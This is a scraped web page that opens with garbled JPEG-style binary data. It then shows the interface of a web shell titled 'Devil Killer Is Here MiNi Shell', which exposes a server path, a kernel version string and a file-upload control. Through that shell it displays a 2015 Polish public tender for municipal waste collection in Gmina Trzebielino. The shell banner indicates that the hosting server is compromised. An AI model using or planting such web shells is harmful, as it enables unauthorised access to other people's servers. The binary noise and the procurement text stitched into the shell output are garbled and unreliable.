JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150428/59981-N-2015.html

<p class="kh_header"><b>Trzebielino: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Trzebielino w okresie od 01.07.2015 do 30.06.2017 roku</b><br>
<b>Numer ogłoszenia: 59981 - 2015; data zamieszczenia: 28.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trzebielino , Trzebielino 7A, 77-235 Trzebielino, woj. pomorskie, tel. 059 8580253, faks 059 8580167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.trzebielino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Trzebielino w okresie od 01.07.2015 do 30.06.2017 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu  jest usługa w zakresie odbioru i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Trzebielino w okresie od 01.07.2015 do 30.06.2017 roku.  Ilość osób na dzień 1.03.2015 r. - 3794 osoby.Według złożonych deklaracji - 2941 osób.  Deklaracji (gospodarstw) - 1023. Szczegółowy opis przedmiotu zamówienia:
Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Trzebielino w okresie od 01.07.2015 do 30.06.2017 roku.
1) Przedmiotem zamówienia jest odbiór i zagospodarowanie całej ilości odpadów komunalnych, w tym: a) zmieszanych odpadów komunalnych i pozostałości z segregacji odpadów, b) papieru i tektury, c) szkła, d) tworzyw sztucznych, metali, odpadów wielomateriałowych, e) odpadów ulegających biodegradacji, f) odpadów wielkogabarytowych, g) zużytych opon, h) zużyte urządzenia elektryczne i elektroniczne i) farby, tusze kleje j) odpady z betonu
od właścicieli nieruchomości zamieszkałych na terenie Gminy Trzebielino z następujących miejscowości: Bąkowo, Bożanka, Broczyna, Cetyń, Ciemnica, Czarnkowo, Dolno, Glewnik, Grądki Dolne, Gumieniec, Kleszczewo, Miszewo, Moczydło, Myślimierz, Objezierze, Owczary, Poborowo, Popielewo, Radaczewo, Starkowo, Starkówko, Suchorze, Szczyciec, Toczek, Trzebielino, Uliszkowice, Zielin, Zielin Górny.
Oferent  winien zapoznać się z terenem Gminy Trzebielino i lokalizacją nieruchomości oraz dojazdem do nich przed złożeniem oferty.
1) Wykonawca zobowiązany jest wyposażyć do dnia 1 lipca 2015 roku aptekę Pod Lwem w Trzebielinie 70, 77-235 Trzebielino w specjalnie oznakowany pojemnik przeznaczony do zbierania przeterminowanych leków oraz opróżniać go po zgłoszeniu o jego wypełnieniu lub raz na pół roku.
2) Wykonawca zobowiązany jest wyposażyć Szkoły Podstawowe w Suchorzu i Trzebielinie oraz Gimnazjum w Starkowie oraz Urząd Gminy w Trzebielinie w pojemniki na zużyte baterie i akumulatory inne niż przemysłowe,
3) Wykonawca zobowiązany jest do wyposażenia poszczególnych miejscowości w pojemniki na odpady segregowane tj.
- niebieskie na papier i tekturę - o pojemności co najmniej      1,5 m3 - 60 szt.
- zielone na szkło białe i kolorowe - o pojemności co najmniej 1,5 m3- 60 szt
- żółte na tworzywa sztuczne, metale, i odpady wielomateriałowe - o pojemności co najmniej 1,5 m3 - 60 szt
miejscowości: Bąkowo-1 kpl., Bożanka-2 kpl., Broczyna-3 kpl., Cetyń-4 kpl.,  Dolno-2 kpl., Glewnik-1 kpl., Gumieniec- 5 kpl., Kleszczewo-1 kpl., Miszewo-3 kpl., Moczydło-1 kpl., Myślimierz- 2 kpl., Objezierze- 2 kpl., Owczary- 1 kpl., Poborowo-3 kpl., Starkowo-3 kpl, Starkówko- 1 kpl., Suchorze- 9 kpl.,  Trzebielino- 9 kpl., Uliszkowice - 1 kpl., Zielin- 5 kpl. , Toczek - 1 kpl.
Rozmieszczenie w/w kompletów w poszczególnych miejscowościach do uzgodnienia z zamawiającym.
4) Szacunkowa ilość odpadów: - komunalnych zmieszanych wynosi ok. 250,0 [Mg/rok].
 - papier i tektura ok. 15,0 [Mg/rok].
- szkło ok. 62 [Mg/rok].
- tworzywa sztuczne - ok. 75 [Mg/rok]
- odpady wielkogabarytowe - ok. 25 [Mg/rok]
- zużyte urządzenia elektryczne i elektroniczne - ok. 6  [Mg/rok]
- odpady z betonu, gruz - ok. 25 [Mg/rok]
- farby, tusze, kleje - ok. 2  [Mg/rok].
- odpady ulegające biodegradacji - ok. 5 ton[Mg/rok].
5) Ilość wytwarzanych odpadów nie jest zależna od Zamawiającego. Wyliczona ilość jest szacunkowa  i może ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego. Podaną ilość należy traktować, jako orientacyjną. Wykonawcy nie przysługuje prawo odszkodowania za nieosiągnięcie wskazanej wielkości.
6) Wykonawca zobowiązany jest do odbioru i zagospodarowania całej masy odpadów komunalnych przekazanych przez właścicieli nieruchomości, zarówno zmieszanych odpadów komunalnych oraz odpadów gromadzonych w sposób selektywny tj. papieru i tektury, szkła, tworzywa sztucznego, metali, odpadów wielomateriałowych oraz odpadów ulegających biodegradacji, w tym zielonych.  W trakcie trwania zamówienia przewiduje się wzrost liczby nieruchomości zamieszkałych o 5-10 %.
7) Wykonawca zobowiązany jest do odbioru zmieszanych odpadów komunalnych gromadzonych na terenie poszczególnych nieruchomości w pojemnikach o minimalnej pojemności 80 l.
8) Wykonawca zobowiązany jest do odbioru selektywnie zebranych odpadów komunalnych gromadzonych na terenie wszystkich miejscowości gminy Trzebielino .
9) Wykonawca zobowiązany jest wyposażyć PSZOK w odpowiednie kontenery do segregacji odpadów komunalnych w tym;
a)odpady niebezpieczne - EKOKONTENER, w tym: baterie, leki, świetlówki, itp.
b)chemikalia (farby, rozpuszczalniki, oleje odpadowe) -  1 szt. - 3000 m3
c)zużyte baterie i akumulatory - pojemnik o pojemności EKOKONTENER,
d)zużyty sprzęt elektryczny i elektroniczny -  6 - m3,
e)odpady wielkogabarytowe - 1 kontener 6 m3,
f)odpady budowlano - rozbiórkowe - kontener od 6 m3,
g)zużyte opony - kontener 6m3,
h)odpady zielone - kontener od 6 m3,
i)opakowania ze szkła - pojemnik o pojemności min 1,5 m3 (typ IGLOO),
j)opakowania z tworzyw sztucznych - pojemnik o pojemności min 2,5 m3 (typ SIATKA),
k)opakowania z papieru i tektury - pojemnik o pojemności 5 m3. Jednocześnie na zlecenie Zamawiającego zobowiązany jest opróżniać punkt selektywnej zbiórki odpadów komunalnych zgodnie z informacją od zamawiającego.
10)  Wykonawca raz w roku zobowiązany jest zorganizować odbiór odpadów komunalnych obejmujący odpady wielkogabarytowe bezpośrednio z terenu miejscowości gm. Trzebielino.
11) Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości zgodnie z ustalonym przez Wykonawcę harmonogramem wywozu, zawartym w Załączniku nr 8 do SWIZ, z zastrzeżeniem, że odbiór w/w odpadów musi odbywać się w godzinach 6.00 - 22.00. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmiany harmonogramu do każdej miejscowości objętej odbieraniem odpadów komunalnych.
12) Wykonawca jest zobowiązany do realizacji  reklamacji  (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, nie opróżnienie pojemników do segregacji odpadów) w przeciągu 24 godzin od otrzymania telefonu lub e-maila od Zamawiającego. O załatwieniu reklamacji należy niezwłocznie powiadomić Zamawiającego. Jeżeli wina za nie wykonanie usługi nie leży  po stronie wykonawcy nie ponosi on odpowiedzialności za niewykonanie usługi.
13) W przypadku wyposażenia wskazanych nieruchomości w pojemniki, o których mowa w pkt 3 -Wykonawca zobowiązuje się do utrzymywania pojemników w należytym stanie technicznym, higienicznym poprzez ich dezynfekcję z częstotliwością, co najmniej raz na kwartał, do oczyszczania miejsc postoju pojemników oraz opróżniania pojemników z częstotliwością określoną w pkt 18
14) Wykonawca zobowiązany jest, w okresach miesięcznych, przedkładać Zamawiającemu karty przekazania odpadów do miejsca ich odzysku, recyklingu lub unieszkodliwienia, jako Załącznik do faktury za wykonanie usługi, w terminie do 15 dnia miesiąca następującego po miesiącu, którego dotyczy.
15) Wykonawca zobowiązany jest do prowadzenia ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane frakcje odpadów.
16) Wykonawca zobowiązany jest do przekazywania zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do wskazanych w Planie Gospodarki Odpadami dla Województwa Pomorskiego 2018  regionalnych instalacji przetwarzania odpadów komunalnych RIPOK Bierkowo bądź RIPOK Sierzno oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami o której mowa  w ustawie z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21).
17) W przypadku, gdy regionalna instalacja RIPOK Bierkowo bądź RIPOK Sierzno ulegnie awarii lub nie będzie mogła przyjmować odpadów z innych przyczyn, należy odpady komunalne dostarczyć do zastępczej instalacji obsługi regionu tj.  RIPOK Czarnówko, RIPOK Eko Dolina.
18) Wykonawca zobowiązany jest do odbierania bezpośrednio z terenu gminy Trzebielino odpadów komunalnych:
a)zmieszanych - bezpośrednio z terenu nieruchomości zamieszkałych -  raz w miesiącu,
b)  papier i tektura, szkło, tworzywa sztuczne, metal, odpady wielomateriałowe -  po wypełnieniu lub 2 razy w miesiącu,
c)  odpady wielkogabarytowe - raz w roku (objazd po terenie gminy i zbiórka bezpośrednio z miejscowości)
d) Zużyte sprzęty elektryczne i elektroniczne - 1 raz w roku z terenu miejscowości gm. Trzebielino (objazd po terenie gminy i zbiórka bezpośrednio z miejscowości)
Jeżeli zbiórka odpadów wielkogabarytowych i zużytego sprzętu odbywałaby się łącznie to musi odbywać się 2 razy w roku.
1) Wykonawca zobowiązany jest przestrzegać regulamin utrzymania czystości i porządku Gminy Trzebielino.
2) Wykonawca zobowiązany jest:
a) posiadać co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej
b) trwale i czytelnie oznakować pojazdy, w widocznym miejscu, firmą oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne,
c)zapewnić, aby konstrukcja pojazdów zabezpieczała przed rozwiewaniem i przed rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady,
d) wyposażyć pojazdy w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych  o położeniu pojazdu i miejscach postojów oraz system czujników zapisujących dane  o miejscach wyładunku odpadów. Systemy powinny umożliwiać weryfikację zapisanych danych,
e) przechowywać w swojej siedzibie dane o których mowa w pkt 20 ppkt d przez okres 2 lat od dnia ich zapisania,
f) wyposażyć pojazdy w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
g) zapewnić, aby pojazdy były zarejestrowane i dopuszczone do ruchu oraz posiadały aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu
drogowym,
h) zabezpieczyć pojazdy i urządzenia przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich gromadzenia, przeładunku, a także transportu,
i) myć i dezynfekować pojazdy i urządzenia z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie,
j) prowadzić dokumentację zawierającą informacje o stosowanych środkach dezynfekujących oraz o częstotliwości wykonywanej dezynfekcji pojazdów i urządzeń
k) pojazdy mogą być wyposażone w urządzenie do ważenia odpadów komunalnych,
l) przeprowadzić działania informacyjne lub edukacyjne w zakresie prawidłowego gospodarowania odpadami komunalnymi, w szczególności w zakresie selektywnego zbierania odpadów komunalnych - 2 razy w roku.
1) Wykonawca zobowiązany jest przedłożyć zaświadczenie o dokonaniu wpisu do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Trzebielino, zgodnie z przepisami art. 9b Ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U z 2013 r. poz. 1399 z późn. zm.),
2) Wykonawca zobowiązany jest kontrolować realizowane przez właścicieli nieruchomości obowiązki w zakresie selektywnego zbierania odpadów komunalnych, a w przypadku jego niedopełnienia Wykonawca zobowiązany jest przyjąć odebrane odpady komunalne jako zmieszane  oraz powiadomić o tym Zamawiającego, niezwłocznie, lecz nie później niż w ciągu 7 dni, (zgodnie z protokołem, który będzie stanowił Załącznik nr 11 do SIWZ).
3) Wykonawca, stosownie do treści art. 9n Ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U z 2013 r. poz. 1399 z późn. zm.) obowiązany jest do sporządzania półrocznych sprawozdań i przekazywania ich Wójtowi Gminy Trzebielino w terminie do końca miesiąca następującego po półroczu, którego dotyczy,
4) Wykonawca w okresie obowiązywania umowy zobowiązany jest osiągnąć poziom recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła oraz poziom recyklingu, przygotowania do ponownego użycia  i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w wysokości określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012r. poz. 645 z późn. zm.),
5) Wykonawca w okresie obowiązywania umowy jest zobowiązany ograniczyć masę odpadów komunalnych ulegających biodegradacji przekazywanych do składowania do wysokości określonej w przepisach Rozporządzenia Ministra Środowiska z dnia 25 maja 2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012r. poz. 676 z późn. zm.).
6) W przypadku stwierdzenia, że usługi wykonywane są niezgodnie z obowiązującymi przepisami, Zamawiający może odmówić zapłaty i żądać ponownego wykonania usługi lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej o której mowa w załączniku nr 7 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP w wysokości 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wadium  w wysokości: 10.000,00 zł (słownie: dziesięć tysięcy  złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie w zakresie wykonywania usług odpowiadającym usługom stanowiącym przedmiot zamówienia tj. realizują lub zrealizowali w okresie ostatnich trzech lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie 2 usługi każda w zakresie odbioru i zagospodarowania odpadów komunalnych od co najmniej 2 000 mieszkańców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponować potencjałem technicznym niezbędnym do wykonania niniejszego zamówienia, tj.:
a) co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, 
b) co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
c) co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
